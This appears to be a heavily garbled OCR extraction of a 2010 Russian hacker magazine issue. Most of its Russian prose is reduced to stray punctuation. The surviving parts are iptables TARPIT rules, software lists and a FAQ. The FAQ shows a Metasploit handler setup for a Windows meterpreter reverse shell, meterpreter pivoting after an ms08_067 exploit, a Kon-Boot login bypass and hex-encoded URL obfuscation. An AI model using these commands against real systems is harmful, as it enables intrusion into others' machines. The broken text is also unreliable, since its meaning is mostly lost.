(patch-o-matic) TARPIT. ( , ACCEPT
DENY), ,
. , TARPIT,
, ,
,
,
. TARPIT
DoS:
# iptables -A INPUT -p tcp -m tcp -dport 80 -j TARPIT

( TCP-, '-sT'):
# iptables -A INPUT -p tcp -m tcp --dport 80 -j ACCEPT
# iptables -A INPUT -p tcp -m tcp --dport 25 -j ACCEPT
# iptables -A INPUT -p tcp -m tcp -j TARPIT

, ,
( 80 25) . , , DELUDE,
, RST-
. CHAOS,
.

, , . , pf
iptables, ,
.z

129

UNITS

Mifrill mifrill@real.xakep.ru

TORRENTS.RU
VS

01


rutracker.org
. ,
,
-,
. -
, ?

, ..
, .
-,
.
,

.

02

,
, ,
. , ,


?
, ,

-
.
,

, (, ,
-). -

130

rutracker.org , ,
.

03


, rutracker.org
.
- ,
?

. ,
,

, ,
, ..
.
, ,
.
: ,
.

04

, , ?
, . , ,
,

,

,
, ,
, .
torrents.ru ifolder-
. ,


. ,

,
.

05


, ,
?
?
. .

, , , .
,
. , ,

.
,
.
,
, ,
.
X 06 /137/ 10

RuTracker.org torrents.ru

06

,
torrents.ru ? ,
,
, , ?
. Rutracker.org
, .
, .
, ,
.

07

: ,

.

. .
,
,
, -
.

, ,

( ).


,
.
? ,

?

magnet-,
?
?

,
, ( 2002 -3 )
. , ,

, ,
.


.
,
.
:
,
,
. , , .
, :).

, ( ). ,
.

, , _
_.avi ,

, , , .

rutracker.org ,
,
,

, ,
.
-
: -

X 06 /137/ 10

08

,
,
- , , (,
, !) . , , :

,
.
,
-,

. ,

, .
- ,
.

. .
(magnetlink , , ,
), ,
-
.

09

,
?

, (

torrents.ru ).
-,
, ,


, .
,
:
, ,
, , ,
. ,

, .
-,
, ,
. ,
. ,

, ,
.
.
,
Dreamtorrent Corp.

131

UNITS

Oriyana oriyana@xpsycho.ru

PSYCHO:

,
. ,
. ,
.

,

,
. .

.
, .
.
,
()

: ,
,
(
). ,
,
.
, -, ,
. ? .
.

:
?

,
,
, , , ;

132

; , ,
.
, ,

.

, .
:
.
:
60- ,
.
, ?
,
:
. ,
,

.
: -...
.
,
,
, , , ,

, .
-

,
(
) .



?
: ,
,
. -
. - ,
.

. , ,
. :
, , .
, ,
. :

,
!?
, , , ,
.
X 06 /137/ 10

Mass-media: ,

(11-16 ) ( ,
) . , ,
.
: ,
, , , , .
, ,
.
,
, ,
. , ,
: ,
.

, .
,
.
, . , ,
, ,
X 06 /137/ 10

, . , ,
, ,
, ,
, .
, :
, ,
- , , , .
. :
, ,
, ,
. :
,
,
, , , .
.
, , .
.

.
. ,
, ,
...

- :
-

, ,
, .
, !. ,
, , 12 .
, .
,

, .

:
,
, .
,

, ,

.

. House
M.D.
.
.
, , , ,

133

UNITS

; , )
.

.
, ;
,
,
, , .
:
.
, ,
, .


,
. ,
.
,
.
.
, ,
.
40 ,
-
.
, . ,
( ) :
;

?; , , ,
, .
, .
-
. , ,
, . ?
!
, , .

,
.

. , ,
, , .
,
, -

134

, ...
.
, ,
.
. , ,
. ,
,
.
. , , ,
, .
,
.
, (.
).

!


, ,
, ,
, .
,
. . :
(, , ) ( ,

, : ,
,
;
;
, ;
,
.
,
-
? ,
.
, .
, , ,

.
5-7 , ,
. , ,
.
,
.
.
.
, ,
. ,
, , : ,
X 06 /137/ 10

,
.
?

.
, .

:
-
,

, ,
, ,
,

.
,
, ,
, , , , ?
, ,

, ?
.
,
,
, , ,
, . , . ,
, ,
, ,
. , .
:

,
, . , ,
.

,
, . -
, -
, -
. ,
, .
X 06 /137/ 10

135


(
). ,
?

.

: ( )
( , , ,

).
-.
, ,
.
, ,
,
.

. ,
-

136

,
.
:
, :
;

, ,
: , -


,
,
( );

, :

.
, ,
!
,
-
.
,
.
,

. , ,
.
, -.
, .

,
.
? :
.
:
,
, .
20 , , .

.
,
,
.
,
. ,
?
,


. .


,
.
, .
. , () (
,
, ), .

X 06 /137/ 10

?
, . , . : ,
, , , , ,
, , , , , , , , , , , , ,
.

,
,

, ?

:
? , , , ,

.
.

,
, ,
.
, ,


.
(, ),
, , .
,
, .
-
, ,
,
.

.
, ,
.
, .
- ,


,

.
? , , , , ,

, ,
, , ,
,
,
.
, , ,
,
,
.
.
, ,
, , .
20 :

. , -
,
, ,
. ,
.
, ,
.
:
,
, .
, .
,
. ,

X 06 /137/ 10

. ,
. ,
. , -
, .

!
4000

- .

,
,
.
,
,
, : ,
, .
? , , ,
, .
.
: ?
:
,
,
, ,
,
-, -

. ,
.

. .

.
, ?
1. .
,
,
? ,
? , :
( ):
,
-
?
2. . ,
.
?
?
,
?.
.

. .
, ,
.
3. , .
. .

.
4. . , IT
:).z

137

UNITS
ant

faq
united
@real.xakep.ru

Q: ,
LHOST,

ruby_example.rc, .

. ,
.

LPORT, PAYLOAD
Metasploit Framework,
.

A: , .
, Metasploit Framework . ,
.

Ruby.
msfconsole.rc
~/.msf3/msfconsole.rc,

msfconsole.
(exploit, PAYLOAD, LPORT, LHOST ..).
, , ,

documentation/msfconsole_rc_ruby_
example.rc
$ ./
msfconsole -r documentation/msfconsole_rc_

138

resource (documentation/
msfconsole_rc_ruby_example.rc)>
use exploit/multi/handler
resource (documentation/
msfconsole_rc_ruby_example.rc)>
set PAYLOAD windows/meterpreter/
reverse_tcp
resource (documentation/
msfconsole_rc_ruby_example.rc)>
set LPORT 4444
resource (documentation/
msfconsole_rc_ruby_example.rc)>
set LHOST 192.168.0.228
resource (documentation/
msfconsole_rc_ruby_example.rc)>
set ExitOnSession false
resource (documentation/
msfconsole_rc_ruby_example.rc)>
exploit -j

, Metasploit HD Moore

Metasploit Express

Q: Metasploit
. , Metasploit
?

A: , Metasploit .
,
10.1.1.1 10.1.1.128.
:
[*] Meterpreter session 1 opened
(10.1.1.1:4444 -> 10.1.1.128:1238)
meterpreter > run get_local_subnets
Local subnet:
10.1.1.0/255.255.255.0
meterpreter > background
msf exploit(ms08_067_netapi) >
route add 10.1.1.0 255.255.255.0 1
msf exploit(ms08_067_netapi) >
route print
Active Routing Table
====================
X 06 /137/ 10

Subnet
------

Netmask
-------

Gateway
-------

10.1.1.0 255.255.255.0 Session 1

, 10.1.1.0
,
Metasploit-.
auto_add_
route:
msf exploit(ms08_067_netapi) > load
auto_add_route
[*] Successfully loaded plugin:
auto_add_route
msf exploit(ms08_067_netapi) >
exploit

,

.
Q:
: ,
( / )?

A:
Nmap. ,
:

, ,
, , .
, , 70 31337.
GUI-
Nmap Zenmap.
Q:
?

A: .
, .
Kon-Boot (www.piotrbania.com/all/
kon-boot). : Floppy/CD/
USB //
. 1st
Kon-Boot. ,
2nd try boot from
drive C: as hd1.
hd1 hd2 ..
Linux
kon-usr, Windows

( ).

Windows (
), Linux ( ,
).
Q: . -

OUTPUT:
-oN/-oX/-oS/-oG <file>: Output
scan in normal, XML, s|<rIpt
kIddi3, and Grepable format,
respectively, to the given
filename.

-oX <_> (output XML) , XML-


.
XML-,

NDiff, Nmap. ,
,
:
$ ndiff -v scanme-1.xml scanme-2.
xml
-Not shown: 95 filtered ports
+Not shown: 993 filtered ports
PORT
STATE SERVICE VERSION
22/tcp
open ssh
25/tcp
closed smtp
53/tcp
open domain
+70/tcp
open gopher
80/tcp
open http
113/tcp closed auth
+31337/tcp open Elite
X 06 /137/ 10

,
. ,
?

A:
, ,
. .
CeWL (Custom Word List
generator www.digininja.org).
Ruby
( 2) .
:
depth ;
min_word_length
;
write .

John The Ripper,
,
( ).

JTR Config Maker (sites.google.com/site/
reusablesec2/jtrconfiggenerator).

Q: Linux
?

A: , ,
,

ls. , ls ltr .

, : find /etc -type f -printf "%T@
%T+ %p" | sort -n.
Q: - Linux ?

A: Windows-
, Samba,

Windows.
: net
rpc shutdown -S thehostname -U theusername,
thehostname
IP-.
, shutdown Windows: net rpc
shutdown -S thehostname -U theusername -f -t
60 ( 60
).
Q: - URL-?
A: URL ,
8- 16-,
32- . URL
66.102.13.19
:
http://0x42.0x66.0x0d.0x63
http://0x42660d63
http://1113984355
http://00000102.00000146.00000015.00000143

,
google.com.
. ,
, ,
, , 8-, 16- 32-
IP-. IP - www.
csgnetwork.com/ipaddconv.html.
Q:
, NAT?

A: NAT,
.
NAT ,
. , .
Pwnat ,

139

UNITS

NAT-,
, NAT,

. - ,
, DNS UPnP/
STUN/ICE - .
: ./pwnat <-s | -c> <args>, -s, -c
.
:
<args>: [local ip] <local
port> <proxy host> [proxy port
(def:2222)] <remote host> <remote
port>

, ,
:
<args>: [local ip] [proxy
port (def:2222)] [[allowed
host]:[allowed port] ...]

Q: , BSOD?

A: ,
, ,
WhoCrashed (www.
resplendence.com/whocrashed). -
, .
, , -.
, , ,
, (!). ,
32-, 64- .

Rvalue-, ,
.
Q:
-,
.

C++0x.
?

A: , ,
,
C++.
(draft-),
: .
, VS2010
C++.
,
C++0x,
. ,
.
, -,
,

140

A: about:config
( ). "extensions.
checkCompatibility"
"false". ,
.

, , ,

Q: : -

FTP,

, -

A: ,
; ,
,
(, ..).

, . (api.
yandex.ru/detector/doc/dg/concepts/About.
xml). .
http://phd.yandex.net/detect/ ,
XML- .
(
iPhone, Android ,
, Opera Mini).
HTTP-,
: profile, wap-profile, x-wap-profile,
user-agent, x-operamini-phone-ua.
PHP/Perl
.

SSH

Q: Gmail' - Drag'n'Drop'
. -? .

Q: Visual Studio -

A:
HTML5 FileAPI (www.
w3.org/TR/2009/WD-FileAPI-20091117).
JS
.
, MIME-, , ! ,
HTML5,
: FileAPI
Firefox Chrome.
,
:
javascript.ru/blog/Brmaley.ee/FileAPI, www.
kigorw.com/articles/dd-file.
Q: Firefox
, ,

, ?

A:
SFTP,
WinSCP (winscp.net).
:
, ,
.
,
(
AccountName).
Ctrl+T . , ,
, .
, .
option batch on
option confirm off
open AccountName
cd /home/step/
call tar -cz --exclude=*cache* -f /
home/step/tmp/FTP-backup-$(date
+%Y-%m-%d).tgz ./public_html/
cd /home/rarst/tmp/
get -delete FTP-backup* "c:\My
Dropbox\Backup\"
exit


. open
,
(
).

Get
, ( Dropbox).
WinSCP (
, , nnCron),
WinSCP.
exe /console /script="backup.txt".
, , , , backup.txt. z
X 06 /137/ 10

>Multimedia
1by1 1.69
AV Voice Changer 7.0
BlockCAD 3.18
FastStone Image Viewer 4.2
Google Earth 5
HandBrake 0.9.4
Nitro PDF Professional 6
Paint.NET 3.5.5
Pepakura Designer 3.0.7
Picasa 3.6
PrimoPDF
Recolored 1.1
ScreenshotCaptor 2.78.0.1
SUPER 2010 build37
The KMPlayer 2.9.3.1428

>Misc
7stacks 1.5beta
Context Menu Enhancer 2.0
Cyber-D's Autodelete 2.24
Dexpot 1.5.0
FileAlyzer 1.6.0.4
FolderSize 1.0.7
Gmail Notifier Plus for Windows
7 2.2
Jumplist-Launcher 7
LiberKey Standard 4.8
Metamorphose 2 0.7.0
OffiSync Free
Regshot 1.8.2
Replace Text 2.2
StandaloneStack 2.0.7
ThinkingRock 2.2.1
WhoCrashed 2.10

>Games
OpenTTD 1.0.1
Warsow 0.5

>>WINDOWS
>Development
Beyond Compare 3.1.11
BinVis
CodeSmith 5.2.1 Professional
DbOctopus 1.1.1
DLL Export Viewer 1.36
Gobby 0.5
HeidiSQL 5.1
HelpNDoc 2.5
Hex Workshop 6.0.1
HexAssistant 2.7
Intype Alpha 0.3.1
IronRuby 1.0
JavaFX 1.3 SDK
Mercurial 1.5.1
MonoDevelop 2.2.2
MySQL Workbench 5.1.18a
Negatory Assembly Studio 1.0
PowerGUI Build 2.0.0
py2exe 0.6.9
Qt Creator 1.3.1
SharpDevelop 3.2RC2
TOra 2.1.2
TortoiseSVN 1.6.8

>>UNIX
>Desktop
Adobe Reader 9.3.2
aTunes 2.0.0

>System
Auslogics BoostSpeed 4.5.15
Auslogics Disk Defrag 3.1.4
Avast Free Antivirus 5.0.507
Comodo Firewall + Antivirus for
Windows 4.0
HijackThis 2.0.4
Macrium Reflect FREE Edition
4.2.2525
Microsoft Security Essentials
MultiMon Lite
Online Armor Free v4.0.0.44
OSSEC 2.4.1
Paragon Backup & Recovery 10.1
Free Edition
Speccy 1.01.132
Total Commander 7.55 beta 3

>Security
AxCrypt 1.7
Bruter 1.0
DarunGrim 2.5.2
DJ Java Decompiler 3.11.11.95
Fiddler2 Beta
FOCA 2.0.2
inSSIDer
Javascript Keylogger 1.4
JBroFuzz 2.1
Nessus 4.2.2
Netsparker Community Edition
OperaPasswordDecryptor
OWASP Code Crawler 2.7
PatchDiff2 2.0.6
PDFiD 0.0.11
Peach 2.3.6
PyLoris 3.0
Sandcat + Sandcat4PHP 4.0 RC1
Scapy 2.1
SFX-SQLi
SIP Workbench v1.0.0.3970
Snort 2.8.6
TrueCrypt 6.3a
VB Decompiler Lite 7.9

>Net
Desktop Google Reader 1.3
Download Master Portable
5.6.5.1201
HydraIRC 0.3
LogMeIn Hamachi
Radmin 3.4
The Dude 3.6
uTorrent 2.0.1
Torrent - a (very) tiny BitTorrent
client_files
Xmarks
Internet Explorer

VueScan 8.6.28
Xfire 1.124

>Net
Adobe Flash Player 10.0.45.2
EiskaltDC++ 2.0.1
Empathy 2.30.1
Firestarter 1.0.3
FreeDC++ 0.0.2
Google Chrome 5.0.342.9 Beta
Gufw 9.10.4
Jucy 0.83
MCabber 0.10.0
Miro 3.0.1
Mozilla Firefox 3.6.3
Mumble 1.2.2
Opera 10.10
Pidgin 2.6.6
Skype 2.0.072
Vuze 4.4
W3Perl 3.085
Websitary 0.6
WeeChat 0.3.2

>Games
Bos Wars 2.6.1

>Devel
Bouml 4.20.0
Bugzilla 3.6
Diffuse 0.4.3
GCC 4.5.0
Gtest 1.5.0
IcedTea 1.8
IronRuby 1.0
iText 5.0.2
itools 0.61.2
KDevelop 4.0 RC3
Perl 5.12
Pharo 1.0
SciPy 0.7.2
SQLAlchemy 0.6.0
SVEditor 0.1.9
Umbrello 2.2.0
Vala 0.8.1
xmlparselib 0.62
Yasm 1.0.0

Awn 0.4.0
Banshee 1.6.0
Birthday Notifier 1.1
BlackRain DarkSide Port
Buuf 2.30.2
Digikam 1.2.0
Gnome Icon Theme 2.30.1
Google Gadgets 0.11.2
gPhoto2 2.4.9
InfoPanel 0.10.1
Lxdvdrip 1.76
Mathomatic 15.0.7
Me TV 1.2.0
Osmo 0.2.10
Printoxx 2.6
Quod Libet 2.2.1
ScanTailor 0.9.8
SMPlayer 0.6.9
VLC 1.0.6

>X-Distr
Ubuntu 10.04 LTS

>System
2click Update 5.5
ATI Catalyst 10.3
BusyBox 1.16.1
Deja Dup 14.0.3
Linux Kernel 2.6.33.3
NTP 4.2.6p1
nVidia 195.36.24
q4wine 0.118
Sakura 2.3.8
Sudo 1.7.2
SysVinit 2.88
Watsup 1.8
Wine 1.1.43
Xen 4.0.0
xf86-video-intel 2.11.0

>Server
Apache 2.2.15
BIND 9.7.0
Charles 3.5.1
CUPS 1.4.3
DHCP 4.1.1
IndiMail 1.7.3
Monkeyd 0.10.1
OpenLDAP 2.4.22
OpenSSH 5.5
OpenVPN 2.1.1
phpFreeChat 1.3
Postfix 2.7.0
PostgreSQL 8.4.3
Samba 3.5.2
Smpfilter 0.4.1
SpamCheck 0.6.8
Squid 3.1.1
Tinc 1.0.13
uHub 0.3.1
Ziproxy 3.0.0

>Security
Aircrack-ng 1.1
Arno iptables firewall 1.9.2
Arping2 2.09
Avast! Home Edition 1.3.0
BleachBit 0.7.4
Cutter 1.0.3
HnTool 0.1.1
Hogger 0.2.0
JBroFuzz 2.1
m0n0wall 1.32
Nessus 4.2.2
Nmap 5.30BETA1
PulledPork 0.4.1
PyLoris 3.0
Sara 7.9.2a
Scapy 2.1.1
SIP Inspector 1.10
Snort 2.8.6
Sshguard 1.4
Xplico 0.5.6

06(137) 2010

UBUNTU
ONLINE-


WINDOWS

. 96

WINDOWS

EARN
CASH
NOW!

06 (137) 2010

. 78

. 54

OPENCART

. 96



: 2
10
.

. 60

RING0- WINDOWS X64

8.5

DVD

!
660 . !
? ?
.
.
( )




.

2100 .



72 000 QIWI ()
.

?
8(495)780-88-29 ( ) 8(800)200-3-999
( ,
, ).
,
info@glc.ru

1.
, ,

shop.glc.ru.
2. .
3.
:
subscribe@glc.ru;
8 (495) 780-88-24;
119021, ,
. , . 11, . 44,
, .
!
c

,
.
, ,
.
:
2100 . 12
1200 . 6
.
,

UNITS

HTTP:// WWW2

ICQ, Skype, Gtalk


IM-

GAZOPA

www.gazopa.com

IMO

www.imo.im
,
-
meebo.com. , ,
imo.im. , , - Skype,
, .
imo.im , Skype, GTalk!
imo.im .


. TinEye
(tineye.com), , . Google Chrome.
, - ,
GazoPa. ,
, ,
Flash-.

.htaccess

.HTACCESS REDIRECT KAMELEOON


htaccessredirect.net

.htaccess , , - , .
404/500 , ,
IP,
.htaccess .
, ,
.htaccess redirect.
-.

144

www.kameleoon.com
. : -
. , . : ,
AJAX-.

.
Kameleoon , , Wordpress.
X 06 /137/ 10